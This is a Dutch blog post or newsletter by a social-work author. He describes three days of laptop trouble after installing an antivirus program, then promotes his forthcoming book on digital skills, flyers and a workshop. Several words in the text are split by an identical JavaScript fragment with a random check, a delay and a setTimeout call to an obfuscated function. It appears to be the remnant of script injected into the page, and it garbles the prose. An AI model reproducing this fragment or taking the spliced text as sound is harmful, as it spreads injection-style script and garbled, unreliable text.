Drie dagen naar de vaantjes

computerproblemenDrie dagen naar de vaantjes. En natuurlijk net op een spannend moment! Want mijn boek komt er snel aan. Dan moet je wel alle opties open hebben om dat van de daken te schreeuwen, toch? Want ik wil dat het gelezen gaat worden dus moet ik zorgen dat zo veel mogelijk mensen er van weten. Maar dat ging dus mis …

Wat er aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and was?

Vreselijk. Mijn laptop kapte er mee! Mijn “liveline” naar de buitenwereld. En weet je waardoor? Doordat ik een anti virus programma kocht en installeerde. Echt, een antivirus programma, stel je voor. Dat installeren lukte, maar daarna opstarten? Nee dus. Drie dagen lang heb ik lopen klooien om dit computerprobleem op te lossen. Ja, in het afgelopen weekeind, met dat mooie weer. Net toen ik klaar was las ik in de krant dat kinderen niet in staat zijn dergelijke problemen zelf op te lossen omdat ze dat nooit geleerd hebben.

Ik ook niet, maar ik weet ongeveer hoe je dat aanpakt. Door het gewoon te proberen. Ja, ik heb vaker drie dagen lopen klooien voordat ik iets oploste. Ook wel eens minder, gelukkig. Maar daardoor ga je wel diep nadenken, creatief zijn, uitproberen, kijken wat er gebeurd. En ineens lukt het toch!

Wauw!

In mijn geval heb ik mijn hele laptop schoongemaakt. Alles gewist! Zeker, daar heb je lef voor nodig. Maar ik had natuurlijk wel eerst een grote schoonmaak van verdachte software en documenten gedaan. Hup, weg er mee. En toen een backup gemaakt op een externe harde schijf. Die ik trouwens niet in huis bewaar voor het geval er brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and komt. Na het wissen heb ik die backup terug gezet, maar nu zonder het nieuwe programma. Uiteraard.

Gelukt!

Want nu kan ik je toch weer deze mail sturen. Pffff. Hoe fijn is het om weer te kunnen werken! Mooi op tijd om je te laten weten dat er intussen mooie flyers binnen zijn gekomen om mijn boek onder de aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht te brengen. Hieronder zie je ze. Ik ga ze binnenkort op de bus doen naar iedereen die ooit eens iets bij me heeft gekocht. En ik neem ze mee naar evenementen en congressen.

Flyer boek digivaardig sociaal werk

Marketing dus. Of reclame, wat je wil. En ouderwets handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andwerk, met enveloppen en etiketten. Ik heb er 250 dus ik ben wel even bezig.

En het boek?

Dat schijnt deze week in het Centraal Boekhuis te arriveren. Wanneer jij het hebt besteld krijg je het misschien een dezer dagen thuisgestuurd! Ben je nieuwsgierig en wil je het boek ook reserveren (en … het komt er nu echt heel snel aan!) dan kan je hier aanmelden en bestellen: https://www.welzijn30.nl/digivaardig-sociaal-werk/

Check daar ook de extra’s wanneer je er meer dan 25 tegelijk koopt, of nog meer …

Als je meer persoonlijke “learnings” van mij wil horen over digitaal werken, koop dan mijn workshop in. Ik kom graag een dagdeel vertellen waarom het belangrijk is dat jij en je collega’s online actief en zichtbaar zijn. Hoe lastig dat soms ook is … Wil je dat, klik dan hier: https://www.welzijn30.nl/social-media-workshop-in-zorg-en-welzijn/

Tof! Dankjewel!

Hans Versteegh, Welzijn 3.0, voor digivaardig sociaal werk